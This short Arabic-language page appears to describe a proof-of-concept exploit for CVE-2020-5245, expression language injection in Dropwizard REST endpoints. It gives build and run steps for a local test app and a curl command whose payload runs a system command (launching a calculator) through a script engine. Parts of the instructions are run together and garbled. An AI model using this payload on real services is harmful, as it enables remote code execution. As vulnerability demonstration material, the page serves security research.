
استغلال إثبات المفهوم لـ CVE-2020-5245، يُظهر حقن لغة التعبير في نقاط نهاية REST الخاصة بـ Dropwizard عبر معاملات HTTP مصممة خصيصًا.
mvn clean install لبناء تطبيقكjava -jar target/dropwizard-1.0-SNAPSHOT.jar server config.ymlhttp://localhost:8080بعض الخطأ في pom.xml لم تتأثر المكونات الإضافية إعادة الإنتاج

curl http://localhost:8080/bookService/selfValidatingBeanParam?answer=${%27%27.getClass().forName(%22javax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22JavaScript%22).eval(%22java.lang.Runtime.getRuntime().exec(%27/usr/bin/gnome-calculator%27)%22)}